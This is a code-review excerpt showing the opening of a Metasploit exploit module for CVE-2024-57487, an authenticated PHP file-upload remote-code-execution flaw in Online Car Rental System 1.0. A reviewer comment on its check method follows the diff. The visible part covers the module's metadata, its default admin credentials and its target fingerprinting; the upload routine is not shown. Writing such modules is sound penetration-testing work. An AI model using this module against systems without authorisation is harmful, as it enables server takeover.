modules/exploits/multi/http/carrental_fileupload_rce.rb

```diff
@@ -0,0 +1,128 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::PhpEXE
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Car Rental System 1.0 File Upload RCE (Authenticated)',
+        'Description' => %q{
+          This module exploits an authenticated remote code execution vulnerability in the
+          Online Car Rental System 1.0 via the `changeimage1.php` endpoint. An authenticated
+          attacker can upload malicious PHP scripts without proper validation, enabling
+          arbitrary code execution on the server.
+        },
+        'Author' => ['Aaryan Golatkar'],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2024-57487'],
+          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2024-57487']
+        ],
+        'DisclosureDate' => '2025-01-13',
+        'Platform' => 'php',
+        'Arch' => ARCH_PHP,
+        'Privileged' => false,
+        'Targets' => [['Automatic', {}]],
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'Base path to Online Car Rental System', '/']),
+        OptString.new('USERNAME', [true, 'The admin username', 'admin']),
+        OptString.new('PASSWORD', [true, 'The admin password', 'Test@12345']),
+        OptInt.new('SHELL_TIMEOUT', [false, 'Seconds to wait for shell execution', 5])
+      ]
+    )
+  end
+
+  def check
+    res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'admin/'))
+    return CheckCode::Unknown('Failed to access the target.') unless res && res.code == 200
+
+    if res.body.include?('Online Car Rental System')
+      return CheckCode::Appears('The target appears to be the Online Car Rental System.')
+    end
+
+    CheckCode::Safe
```

Comment:
So all versions are vulnerable? Also, would be probably useful to leave some message, like: 
```suggestion
    CheckCode::Safe('Online Car Rental System detected');
```